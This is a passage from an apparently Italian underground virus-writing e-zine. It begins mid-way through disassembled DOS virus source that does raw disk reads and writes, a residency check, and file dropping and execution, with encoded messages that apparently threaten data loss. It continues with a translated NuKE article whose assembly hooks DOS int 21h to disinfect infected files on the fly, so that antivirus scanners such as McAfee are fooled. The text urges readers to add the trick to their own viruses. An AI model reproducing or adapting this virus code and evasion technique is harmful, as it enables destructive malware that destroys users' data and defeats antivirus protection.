add bx,609h mov al,[bx] mov ah,0Eh mov bx,0 int 10h ; Video display ah=functn 0Eh ; write char al, teletype mode retn sub_7 endp ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ sub_8 proc near push ds mov bx,ds add bx,1000h mov ds,bx mov bx,0 mov ah,19h int 21h ; DOS Services ah=function 19h ; get default drive al (0=a:) mov cx,50h mov dx,0 int 25h ; Absolute disk read, drive al popf ; Pop flags mov bx,0 mov ds,bx mov ah,19h int 21h ; DOS Services ah=function 19h ; get default drive al (0=a:) mov cx,50h mov dx,0 int 26h ; Absolute disk write, drive al popf ; Pop flags pop ds retn sub_8 endp ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ sub_9 proc near push ds mov bx,ds add bx,1000h mov ds,bx mov bx,0 mov ah,19h int 21h ; DOS Services ah=function 19h ; get default drive al (0=a:) mov cx,50h mov dx,0 int 26h ; Absolute disk write, drive al popf ; Pop flags pop ds retn sub_9 endp loc_36: mov bx,0 mov ax,4B59h int 21h ; DOS Services ah=function 4Bh ; run progm @ds:dx, parm @es:bx cmp ax,666h jne loc_37 ; Jump if not equal jmp loc_41 ; (0AF0) loc_37: push ds pop es push ds push cs pop ds mov si,0 mov di,917h mov cx,100h cld ; Clear direction rep movsb ; Rep when cx >0 Mov [si] to es:[di] pop ds mov ah,2Fh ; '/' int 21h ; DOS Services ah=function 2Fh ; get DTA ptr into es:bx mov ds:data_14e,bx ; (6AE6:0041=0) mov ds:data_15e,es ; (6AE6:0043=6AE6h) mov dx,4Eh mov ah,1Ah int 21h ; DOS Services ah=function 1Ah ; set DTA to ds:dx mov dx,11h mov cx,3Fh mov ah,4Eh ; 'N' int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_38 ; Jump if carry Set mov dx,11h call sub_1 ; (06EE) cmp dl,1 jne loc_38 ; Jump if not equal call sub_2 ; (073C) loc_38: call sub_5 ; (07FD) mov dx,20h mov cx,2 mov ah,3Ch ; '<' int 21h ; DOS Services ah=function 3Ch ; create/truncate file @ ds:dx jc loc_40 ; Jump if carry Set mov bx,ax mov dx,0 mov cx,91Ah mov ah,40h ; '@' int 21h ; DOS Services ah=function 40h ; write file cx=bytes, to ds:dx push ax mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle pop ax cmp ax,cx je loc_39 ; Jump if equal mov dx,20h mov ah,41h ; 'A' int 21h ; DOS Services ah=function 41h ; delete file, name @ ds:dx jmp short loc_40 ; (0AD1) db 90h loc_39: push cs pop es mov bx,cs:data_8e ; (6AE6:0002=0) sub bx,92Ch mov cx,cs sub bx,cx mov ah,4Ah ; 'J' int 21h ; DOS Services ah=function 4Ah ; change mem allocation, bx=siz mov dx,20h push ds pop es mov bx,2Dh mov ax,4B00h int 21h ; DOS Services ah=function 4Bh ; run progm @ds:dx, parm @es:bx loc_40: call sub_6 ; (0813) push cs pop es mov di,0 mov si,917h mov cx,0FFh cld ; Clear direction rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov dx,ds:data_14e ; (6AE6:0041=0) mov bx,ds:data_15e ; (6AE6:0043=6AE6h) mov ds,bx mov ah,1Ah int 21h ; DOS Services ah=function 1Ah ; set DTA to ds:dx loc_41: push cs pop ds jmp $-0F32h jmp $+3DFh db 48h, 9Bh, 9Ch, 3Fh, 5, 0Ah db 5, 3, 1, 3, 0, 6Eh db 71h, 6Dh, 6Dh, 84h, 84h, 84h db 0A8h, 0ADh, 0B7h, 0AFh, 84h, 0A8h db 0A9h, 0B7h, 0B8h, 0B6h, 0B3h, 0BDh db 0A9h, 0B6h, 84h, 5Dh, 84h, 0A5h db 84h, 0B7h, 0B3h, 0B9h, 0BAh, 0A9h db 0B2h, 0ADh, 0B6h, 84h, 0B3h, 0AAh db 84h, 0B1h, 0A5h, 0B0h, 0B8h, 0A5h db 6Eh, 71h, 6Eh, 71h, 6Dh, 6Dh db 0ADh, 84h, 0CCh, 0C5h, 0DAh, 0C9h db 84h, 0CEh, 0D9h, 0D7h, 0D8h, 84h db 0A8h, 0A9h, 0B7h, 0B8h, 0B6h, 0B3h db 0BDh, 0A9h, 0A8h, 84h, 0D8h, 0CCh db 0C9h, 84h, 0AAh, 0A5h, 0B8h, 84h db 0D3h, 0D2h, 84h, 0DDh, 0D3h, 0D9h db 0D6h, 84h, 0A8h, 0CDh, 0D7h, 0CFh db 84h, 85h, 85h, 6Eh, 71h, 84h db 84h, 84h, 84h, 84h, 84h, 0ACh db 0D3h, 0DBh, 0C9h, 0DAh, 0C9h, 0D6h db 90h, 84h, 0ADh, 84h, 0CCh, 0C5h db 0DAh, 0C9h, 84h, 0C5h, 84h, 0C7h db 0D3h, 0D4h, 0DDh, 84h, 0CDh, 0D2h db 84h, 0B6h, 0A5h, 0B1h, 90h, 84h db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h db 0D1h, 84h, 0CBh, 0CDh, 0DAh, 0CDh db 0D2h, 0CBh, 84h, 0DDh, 0D3h, 0D9h db 84h, 0C5h, 84h, 0D0h, 0C5h, 0D7h db 0D8h, 84h, 0C7h, 0CCh, 0C5h, 0D2h db 0C7h, 0C9h, 6Eh, 71h, 6Dh, 6Dh db 6Dh, 0D8h, 0D3h, 84h, 0D6h, 0C9h db 0D7h, 0D8h, 0D3h, 0D6h, 0C9h, 84h db 0DDh, 0D3h, 0D9h, 0D6h, 84h, 0D4h db 0D6h, 0C9h, 0C7h, 0CDh, 0D3h, 0D9h db 0D7h, 84h, 0C8h, 0C5h, 0D8h, 0C5h db 92h, 6Eh, 71h, 84h, 84h, 84h db 84h, 84h, 0BBh, 0A5h, 0B6h, 0B2h db 0ADh, 0B2h, 0ABh, 9Eh, 84h, 0ADh db 0AAh, 84h, 0BDh, 0B3h, 0B9h, 84h db 0B6h, 0A9h, 0B7h, 0A9h, 0B8h, 84h db 0B2h, 0B3h, 0BBh, 90h, 84h, 0A5h db 0B0h, 0B0h, 84h, 0BDh, 0B3h, 0B9h db 0B6h, 84h, 0A8h, 0A5h, 0B8h, 0A5h db 84h, 0BBh, 0ADh, 0B0h, 0B0h, 84h db 0A6h, 0A9h, 84h, 0B0h, 0B3h, 0B7h db 0B8h, 84h, 91h, 84h, 0AAh, 0B3h db 0B6h, 0A9h, 0BAh, 0A9h, 0B6h, 84h db 85h, 85h, 6Eh, 71h, 6Dh, 6Dh db 84h, 84h, 84h, 0BDh, 0D3h, 0D9h db 0D6h, 84h, 0A8h, 0C5h, 0D8h, 0C5h db 84h, 0C8h, 0C9h, 0D4h, 0C9h, 0D2h db 0C8h, 0D7h, 84h, 0D3h, 0D2h, 84h db 0C5h, 84h, 0CBh, 0C5h, 0D1h, 0C9h db 84h, 0D3h, 0CAh, 84h, 0AEh, 0A5h db 0A7h, 0AFh, 0B4h, 0B3h, 0B8h, 71h db 6Eh, 71h, 6Eh, 6Dh, 6Dh, 84h db 84h, 84h, 84h, 84h, 84h, 0A7h db 0A5h, 0B7h, 0ADh, 0B2h, 0B3h, 84h db 0A8h, 0A9h, 84h, 0B1h, 0A5h, 0B0h db 0B8h, 0A9h, 84h, 0AEh, 0A5h, 0A7h db 0AFh, 0B4h, 0B3h, 0B8h db 'nqnqmmm-1' db 1Fh, 6Dh, 2Dh, 31h, 1Fh, 6Dh db 2Dh, 31h, 1Fh, 6Eh, 71h, 6Dh db 6Dh, 6Dh, 3Bh, 0, 3Bh, 6Dh db 3Bh, 0A3h, 3Bh, 6Dh, 3Bh, 0FFh db ';nqmmm,1 m,1 m,1 nqmmm' db 84h, 84h, 84h, 84h, 0A7h, 0B6h db 0A9h, 0A8h, 0ADh, 0B8h, 0B7h, 84h db 9Eh, 84h, 99h db 'nqqnqnmmm' db 0, 0, 0, 84h, 0A1h, 84h db 0BDh, 0D3h, 0D9h, 0D6h, 84h, 0A8h db 0CDh, 0D7h, 0CFh, 6Eh, 71h, 6Dh db 6Dh, 6Dh, 0A3h, 0A3h, 0A3h, 84h db 0A1h, 84h, 0B1h, 0DDh, 84h, 0B4h db 0CCh, 0D3h, 0D2h, 0C9h, 84h, 0B2h db 0D3h, 92h, 6Eh, 71h, 6Eh, 71h db 6Dh, 6Dh, 6Dh, 0A5h, 0B2h, 0BDh db 84h, 0AFh, 0A9h, 0BDh, 84h, 0B8h db 0B3h, 84h, 0B4h, 0B0h, 0A5h, 0BDh db 'qnqnqnqnqn' db 88h, 6Eh, 71h, 0A6h, 0A5h, 0B7h db 0B8h, 0A5h, 0B6h, 0A8h, 84h, 85h db 84h, 0BDh, 0D3h, 0D9h, 0C4h, 0D6h db 0C9h, 84h, 0D0h, 0D9h, 0C7h, 0CFh db 0DDh, 84h, 0D8h, 0CCh, 0CDh, 0D7h db 84h, 0D8h, 0CDh, 0D1h, 0C9h, 84h db 91h, 84h, 0C6h, 0D9h, 0D8h, 84h db 0CAh, 0D3h, 0D6h, 84h, 0DDh, 0D3h db 0D9h, 0D6h, 84h, 0D3h, 0DBh, 0D2h db 84h, 0D7h, 0C5h, 0CFh, 0C9h, 90h db 84h, 0D2h, 0D3h, 0DBh, 6Eh, 71h db 0B7h, 0BBh, 0ADh, 0B8h, 0A7h, 0ACh db 84h, 0B3h, 0AAh, 0AAh, 84h, 0BDh db 0B3h, 0B9h, 0B6h, 84h, 0A7h, 0B3h db 0B1h, 0B4h, 0B9h, 0B8h, 0A9h, 0B6h db 84h, 0A5h, 0B2h, 0A8h, 84h, 0A8h db 0B3h, 0B2h, 0C4h, 0B8h, 84h, 0B8h db 0B9h, 0B6h loc_42: mov dl,84h lodsw ; String [si] to ax mov ax,0B384h mov dl,84h mov ax,0B0ADh mov al,84h mov ax,0B1B3h mov bl,0B6h mov dh,0B3h mov bx,8584h test ax,ds:data_33e[di] ; (6AE6:716E=0) mov [bp+71h],ch mov dl,0D3h test ch,[bp+si-3827h] iret ; Interrupt return db 0CDh, 0D2h, 0C4h, 84h, 0A7h, 0CCh db 0C5h, 0D2h, 0C7h, 0C9h, 9Fh, 84h db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h db 0D1h, 84h, 0D4h, 0D9h, 0D2h, 0CDh db 0D7h, 0CCh, 0CDh, 0D2h, 0CBh, 84h db 0DDh, 0D3h, 0D9h, 84h, 0CAh, 0D3h db 0D6h, 84h, 0D8h, 0D6h, 0DDh, 0CDh db 0D2h, 0CBh, 84h, 0D8h, 0D3h, 84h db 0D8h, 0D6h, 0C5h, 0C7h, 0C9h, 84h db 0D1h, 0C9h, 84h, 0C8h, 0D3h, 0DBh db 0D2h, 84h, 85h, 88h, 6Eh, 71h db 0ACh, 0A5h, 84h, 0ACh, 0A5h, 84h db 85h, 85h, 84h, 0BDh, 0D3h, 0D9h db 84h, 0C5h, 0D7h, 0D7h, 0CCh, 0D3h db 0D0h, 0C9h, 90h, 84h, 0DDh, 0D3h db 0D9h, 0C4h, 0DAh, 0C9h, 84h, 0D0h db 0D3h, 0D7h, 0D8h, 9Eh, 84h, 0D7h db 0C5h, 0DDh, 84h, 0A6h, 0DDh, 0C9h db 84h, 0D8h, 0D3h, 84h, 0DDh, 0D3h db 0D9h, 0D6h, 84h, 0A6h, 0C5h, 0D0h db 0D0h, 0D7h, 84h, 92h, 92h, 92h db 6Eh, 71h, 88h, 0CDh, 20h, 0 seg_a ends end start ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [Disinfettazione di un file infetto] UnDeR CoNsTrUcTiOn ³ ³ [ViRiI SeCtIoN] Articolo di: Li-Nux ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ****************************************** ** Disinfettazione di un File Infetto ** ** ** ** By Rock Steady/NuKE ** ****************************************** Tradotto e modificato da: Li-Nux [UnDeR CoNsTrUcTiOn] DISCLAIMER: Io, il traduttore e colui o coloro che hanno scritto l'articolo o comunque hanno aiutato, non sono responsabili. NON MI PRENDO RESPONSABILITA' PER L'UTILIZZO DI QUESTI DATI E PER I LORO EVENTUALI DANNI DIRETTI ED INDIRETTI. IO LI-NUX, HO TRADOTTO LA VERSIONE INGLESE E L'HO MODIFICATA PER RENDERE IL TESTO PIU' ADATTO ALLA LINGUA ITALIANA. NON SONO RESPONSABILE IN ALCUNA MANIERA. IO VIETO CHE QUESTO ARTICOLO VENGA POSTATO SU NEWSGROUP SIA IN MANIERA INTEGRALE CHE PARZIALE. SE QUALCUNO LO FARA' SI PRENDERA' TUTTE LE RESPONSABILITA'. QUESTO ARTICOLO E' STATO CREATO PER LA E-ZINE DEL GRUPPO [UNDER CONSTRUCTION] !!! NON FATE CAZZATE !!! RICORDOTE CHE I LAMER CHE FANNO CAZZATE NON SOPRAVVIVONO... ------------------------------------------------------------------------------ Introduzione !!! Beh, molti di voi si chiederanno, perchŠ mi devo scoglionare a tradurre dall'inglese all'italiano per cercare di fare qualcosa in piu' ? PerchŠ nessun gruppo di merda in Italia ci aiuta a noi che vogliamo capire di piu' ? CAZZO QUANTE DOMANDE FATE !!! :) La risposta Š semplice, ditemi voi chi ha in Italia un minimo di organizzazione... e quindi io che sono specializzato in questo gruppo sui virii, ma so fare anche altre cose..., mi sono preso la rottura di palle NON PREOCCUPATEVI, MI FA PIACERE !!!, di tradurre ed aggiungere o comunque modificare in positivo testi che a me piacciono. Comunque troverete anche altri articoli miei. BUON DIVERTIMENTO !!! :)))) ------------------------------------------------------------------------------ Il miglior vantaggio che un virus puo' avere Š la disinfezione al volo, praticamente il virus deve rimanere nascosto il piu' possibile. Questo Š un ottimo metodo di stealth, poichŠ l'antivirus non Š in grado di disinfettare il file infetto, i programmi Anti-Virus diventeranno semplicemente pazzi !!! eheheh :) L'autore di questo testo ricorda quando fu creato il Npox 2.0 che si disinfettava ogni volta che l'F-Prot e lo scan aprivano il file infetto, dopo cio' il file veniva nuovamente infettato. Questa Š la routine 'Anti Fuck-Prot' che Š stata addata al virus, questa apriva il file tramite Int21h/6C00H, Npox disinfettava solo su Int21h/3Dh, comunque creare il virus che disinfetta su Int21h/6C00h, non richede molto lavoro, semplicemente prendere le stringhe ASCII da DS:SI e mettere in SI dentro DX noi abbiamo DS:DX che puntiamo su lui, mentre facciamo partire la routine. Purtroppo non Š molto semplice da spiegare... comunque leggete avanti e capirete :) La semplice idea di disinfezione Š questa... -Per i files .COM Rimetti apposto i primi 3 bytes del programma, con quelli originali, questi 3 bytes, infatti vengono usati dentro i virus per fare un jump alla fine del file, per far partire il codice virale. Dopo essere saltati alla fine del file COM e aver sottratto la lunghezza del virus dalla lunghezza del file, avrete il nuovo un nuovo valore, la lunghezza del file originale ! (Mi pare ovvio anche uno della Telecom lo capirebbe :) NOTA: se il virus che hai scritto cambia lunghezza ad ogni infezione (perchŠ Polimorfico) deve salvare la lunghezza del file prima di infettarlo. -Per i file EXE & Overlays Questa procedure non Š differente, devi solamente cambiare il CS:IP & SP:SS nel header EXE, rimetti apposto i valori originali, oppure, per non perdere tempo, salva l'header EXE originale (il primo bytes 1b) nel virus, come il Npox 2.0, questo lo sottraer… dalla lunghezza originale e lo canceller…. L'autore ha usato la routine Closely nel suo virus Npox 2.0 che ti servir… per capire questo processo Okay, la prima cosa che devi fare Š controllare se il file infettato Š un file COM o EXE, non perdere tempo con altre estensioni, poichŠ faresti un codice troppo grande e il marchio delle 'infezioni' puo' fallire ! Ricorda che il virus usa come marchio i secondi, settati a 60 (come Npox). Naturalmente solo i files infettati segneranno 60 secondi sulla data ! E questa routine non Š necessaria... opening_file: call check_extension ;Cerca estensione .COM jnc open_fuck2 ;SI; Jmp & Disinfetta call check_exten_exe ;Cerca estensione .EXE jnc open_fuck2 ;SI; Jmp & Disinfetta jmp dword ptr cs:[int21] ;Per altre cose... vai al DOS ;A questo punto i file hanno un'estensione .COM o .EXE, continua... open_fuck2: push ax ;Salva AX mov ax,3d02h ;Pronto per aprire call calldos21 ;Fai questo ! ;NOTA: E' importante che chiami Int21h! Non devi dare un comando "Int 21h", ;il virus lo intercetta, e fa partire questa routine che continuer… sempre. ;A questo punto lo stack diventer… troppo grosso e sovrascriver… il codice ;e il sistema in circa 2 secondi... jnc open_fuck1 ;Niente errori continua pop ax ;Fa un restore iret ;Esci open_fuck1: push bx push cx push dx push ds mov bx,ax ;BX=handler del file mov ax,5700h ;Prende la data del file call calldos21 mov al,cl ;Muove i secondi in al or cl,1fh ;Aggiusta i secondi dec cx ;60 Seconds xor al,cl ;compara... jnz opening_exit3 ;Non sono 60 secondi... ESCI ! dec cx mov word ptr cs:[old_time],cx ;Salva mov word ptr cs:[old_date],dx ;Salva la data. mov ax,4202h ;Vai alla fine del file xor cx,cx xor dx,dx call calldos21 mov cx,dx ;Salva la lunghezza del file mov dx,ax ;ci servir… dopo per ;sottrarre la lunghezza del push cx ;virus dal programma. push dx ;Salva il programma... Adesso prendiamo i primi 3 bytes (per i files com) o i primi 1B bytes (EXE header) nel virus Nuke Pox io salvo i 3 bytes originali del file .com alla vera fine! Il buffer che ho creato fu di 1B hex bytes, che serve per immetterci l'header del file EXE o i 3 bytes del file .com, l'inizio dei 3 bytes Š la fine dei 1B bytes, quindi Š alla fine... salvaci allora i 3 bytes o l'header exe per il tuo virus, oppure usa la routine del Npox... sub dx,1Bh ;Sottrae 1B bytes dalla sbb cx,0 ;lunghezza del file ! mov ax,4200h ;Ora il nostro puntatore call calldos21 ;si "punta" sull'1B bytes ;Dove ci sono i bytes ;originali del file COM & EXE push cs pop ds ;CS=DS (for exes) mov ah,3fh ;Questo legge nel buffer mov cx,1Bh ;1B bytes mov dx,offset buffer ;sul nostro buffer call calldos21 Ora noi prendiamo i bytes originali, per scriverli dietro all'inizio del file... xor cx,cx ;Va' all'inizio del file xor dx,dx ; mov ax,4200h call calldos21 mov ah,40h ;scrive i primi 3 bytes mov dx,offset buffer ;nostro buffer mov cx,1Bh ;1B bytes per i file EXE cmp word ptr cs:[buffer],5A4Dh je open_exe_jmp ;Se Š un file exe jump mov cx,3h ;Se Š un file com scrivi 3 bytes open_exe_jmp: call calldos21 Ora scriviamo i dati originali del file da piazzare, ora ci serve tagliare il virus fuori dal file, il virus Š scritto alla fine del file, ora dobbiamo settare il nostro puntatore del file al EOF - Virus_Size, cosi' prendiamo la lunghezza originale del file ! pop dx ;EOF - Virus_Size pop cx ;La lunghezza del file sub dx,virus_size ;sottrae la lunghezza virus sbb cx,0 mov ax,4200h call calldos21 In questa parte del virus, la nostra nuova locazione ptr che verr… scritta da bytes 0, il Dos crea quella nuova locazione il nuovo EoF e il virus risulter… tagliato e cancellato il suo settore nella fat. mov ah,40h ;Scrivi nuovo EOF xor cx,cx ;Zero Bytes call calldos21 ;fai questo mov cx,word ptr cs:[old_time] ;Fa un restore del tempo mov dx,word ptr cs:[old_date] ;Fa un restore della data mov ax,5701h int 21h mov ah,3eh ;Chiude il file call calldos21 opening_exit3: pop ds pop dx pop cx pop bx pop ax jmp dword ptr cs:[int21] ;Ritorna a DOS... Il file Š stato disinfettato, ora possiamo ritornare al DOS che parir… il file per l'ispezione... Rock Steady/NuKE --> Tradotto e modificato da: Li-Nux --> [UnDeR CoNsTrUcTiOn] --- ThE BeSt GrOuP In ThE WoRlD ------------------------------------------------------------------------------ Allora, adesso che avete queste bellissime informazioni, potrete prendere il vostro virus e modificarlo... eheheh :) RICORDO CHE QUESTO TRUCCO FUNZIONA SOLO CON MCAFEE Comunque, state certi che vi forniro' il metodo per il famoso ThunderByte Antivirus... Chiunque gli Š piaciuto l'articolo, vuole aiuto, ecc... mi puo' contattare a: hpavc@cryogen.com Comunque mi puo' trovare in IRCnet tranquillamente, il mio nick Š: Li-Nux UN SALUTO A TUTTI VOI E SOPRATTUTTO A TUTTI I MEMBRI DEL BELLISSIMO GRUPPO [UnDeR CoStRuCtIoN] ------------------------------------------------------------------------------ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ UnDeR CoNsTrUcTiOn þ [Nø0001] ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ þ Bene siamo arrivati alla fine di questa "splendida" (per me e spero ³ ³ anche per tutti coloro che leggono) e-zine !!! Scusateci gli eventuali ³ ³ errori grammaticali e/o di scrittura, se vi interessa avere informazioni³ ³ supplementari, volete essere aiutati, volete giudicare il nostro lavoro,³ ³ magari migliorandolo con le vostre richieste, oppure volete contribuire ³ ³ alla stesura di qualche articolo di questa e-zine, contattateci alla ³ ³ seguente e-mail: u_construction@hotmail.com ³ ³ ³ ³ Vogliamo soddisfare le vostre richieste, vogliamo lavorare per creare ³ ³ una piu' fondata conoscenza underground, siamo qui per questo, ³ ³ continueremo per questo, questo numero... Š nulla... ma Š nostro siamo ³ ³ partiti da zero e continueremo cosi' !!! ³ ³ [UnDeR CoNsTrUcTiOn] ³ ³ Un saluto ai lettori ³ ³ da parte di tutti i ³ ³ MEMBRI !!!!!!!!!!!!! ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ >>>>>>>>>> IRC-NET >>>>>>>>>> #phreak.it